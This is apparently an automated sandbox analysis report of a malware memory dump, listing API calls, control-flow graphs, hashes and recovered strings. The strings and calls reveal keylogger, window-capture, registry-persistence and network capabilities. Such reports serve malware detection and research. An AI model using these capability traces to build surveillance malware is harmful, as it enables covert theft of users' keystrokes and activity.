                                                                              • GetForegroundWindow.USER32 ref: 0040A467
                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                              • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                              • String ID: [${ User has been idle for $ minutes }$]
                                                                              • API String ID: 911427763-3954389425
                                                                              • Opcode ID: 4f8b8cb0c9ee605f642951e99c9669dc9c444aa7125a2f7fdf95d7018cf2d41d
                                                                              • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                              • Opcode Fuzzy Hash: 4f8b8cb0c9ee605f642951e99c9669dc9c444aa7125a2f7fdf95d7018cf2d41d
                                                                              • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1194 40c89e-40c8c3 call 401e52 1197 40c8c9 1194->1197 1198 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1194->1198 1200 40c8d0-40c8d5 1197->1200 1201 40c9c2-40c9c7 1197->1201 1202 40c905-40c90a 1197->1202 1203 40c9d8 1197->1203 1204 40c9c9-40c9ce call 43ac0f 1197->1204 1205 40c8da-40c8e8 call 41a74b call 401e18 1197->1205 1206 40c8fb-40c900 1197->1206 1207 40c9bb-40c9c0 1197->1207 1208 40c90f-40c916 call 41b15b 1197->1208 1222 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1198->1222 1209 40c9dd-40c9e2 call 43ac0f 1200->1209 1201->1209 1202->1209 1203->1209 1218 40c9d3-40c9d6 1204->1218 1225 40c8ed 1205->1225 1206->1209 1207->1209 1223 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1208->1223 1224 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1208->1224 1219 40c9e3-40c9e8 call 4082d7 1209->1219 1218->1203 1218->1219 1219->1198 1230 40c8f1-40c8f6 call 401e13 1223->1230 1224->1225 1225->1230 1230->1198
                                                                              APIs
                                                                              • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LongNamePath
                                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                              • API String ID: 82841172-425784914
                                                                              • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                              • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                              • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                              • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                              • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCurrentOpenProcessQueryValue
                                                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                              • API String ID: 1866151309-2070987746
                                                                              • Opcode ID: fe419c2785459906763a74068e8ef53e6a02a80517b05617e32006b50ad171bb
                                                                              • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                              • Opcode Fuzzy Hash: fe419c2785459906763a74068e8ef53e6a02a80517b05617e32006b50ad171bb
                                                                              • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1364 409d97-409da7 1365 409e44-409e47 1364->1365 1366 409dad-409daf 1364->1366 1367 409db2-409dd8 call 401e07 CreateFileW 1366->1367 1370 409e18 1367->1370 1371 409dda-409de8 GetFileSize 1367->1371 1372 409e1b-409e1f 1370->1372 1373 409dea 1371->1373 1374 409e0f-409e16 CloseHandle 1371->1374 1372->1367 1375 409e21-409e24 1372->1375 1376 409df4-409dfb 1373->1376 1377 409dec-409df2 1373->1377 1374->1372 1375->1365 1380 409e26-409e2d 1375->1380 1378 409e04-409e09 Sleep 1376->1378 1379 409dfd-409dff call 40a7f0 1376->1379 1377->1374 1377->1376 1378->1374 1379->1378 1380->1365 1382 409e2f-409e3f call 4082dc call 4098a5 1380->1382 1382->1365
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                              • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                                              • String ID: `AG
                                                                              • API String ID: 1958988193-3058481221
                                                                              • Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                              • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                              • Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                              • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1386 4126d2-4126e9 RegCreateKeyA 1387 412722 1386->1387 1388 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1386->1388 1390 412724-412730 call 401eea 1387->1390 1388->1390
                                                                              APIs
                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                              • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                              • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateValue
                                                                              • String ID: HgF$pth_unenc
                                                                              • API String ID: 1818849710-3662775637
                                                                              • Opcode ID: 527e28f3b051cf4da2b25fb1b82031e69a8b63d3ddd468a42223c023ca7a807e
                                                                              • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                              • Opcode Fuzzy Hash: 527e28f3b051cf4da2b25fb1b82031e69a8b63d3ddd468a42223c023ca7a807e
                                                                              • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateThread.KERNELBASE(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread$LocalTimewsprintf
                                                                              • String ID: Offline Keylogger Started
                                                                              • API String ID: 465354869-4114347211
                                                                              • Opcode ID: aa7dad158495ae52b0f3a751208c625103e585d813ac465631ead48c5b0ce597
                                                                              • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                              • Opcode Fuzzy Hash: aa7dad158495ae52b0f3a751208c625103e585d813ac465631ead48c5b0ce597
                                                                              • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                              APIs
                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                              • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateValue
                                                                              • String ID: TUF
                                                                              • API String ID: 1818849710-3431404234
                                                                              • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                              • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                              • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                              • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                              • CloseHandle.KERNELBASE(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandlePointerWrite
                                                                              • String ID:
                                                                              • API String ID: 3604237281-0
                                                                              • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                              • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                              • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                              • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                              APIs
                                                                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                              • GetLastError.KERNEL32 ref: 0040BEF1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateErrorLastMutex
                                                                              • String ID: (CG
                                                                              • API String ID: 1925916568-4210230975
                                                                              • Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                              • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                              • Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                              • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                              • RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                              • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                              • Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                              • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                              • RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                              • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                              • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                              • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                              • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                              • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                              • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                              • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: xAG
                                                                              • API String ID: 176396367-2759412365
                                                                              • Opcode ID: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                              • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                              • Opcode Fuzzy Hash: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                              • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                              APIs
                                                                              • _free.LIBCMT ref: 0044B9DF
                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap$_free
                                                                              • String ID:
                                                                              • API String ID: 1482568997-0
                                                                              • Opcode ID: 5cfe77718a578226d9c79b09a3ca5d66c4b9dac56741ea3d957ce73d3817e4be
                                                                              • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                              • Opcode Fuzzy Hash: 5cfe77718a578226d9c79b09a3ca5d66c4b9dac56741ea3d957ce73d3817e4be
                                                                              • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                              APIs
                                                                              • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateEventStartupsocket
                                                                              • String ID:
                                                                              • API String ID: 1953588214-0
                                                                              • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                              • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                              • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                              • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                              APIs
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                              • String ID:
                                                                              • API String ID: 3476068407-0
                                                                              • Opcode ID: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                                                                              • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                              • Opcode Fuzzy Hash: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                                                                              • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                              APIs
                                                                              • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                              • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                              • String ID:
                                                                              • API String ID: 1170566393-0
                                                                              • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                              • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                              • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                              • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                              • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                              • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                              • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                              APIs
                                                                              • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Startup
                                                                              • String ID:
                                                                              • API String ID: 724789610-0
                                                                              • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                              • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                              • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                              • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: recv
                                                                              • String ID:
                                                                              • API String ID: 1507349165-0
                                                                              • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                              • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                              • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                              • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: send
                                                                              • String ID:
                                                                              • API String ID: 2809346765-0
                                                                              • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                              • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                              • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                              • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                              APIs
                                                                              • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
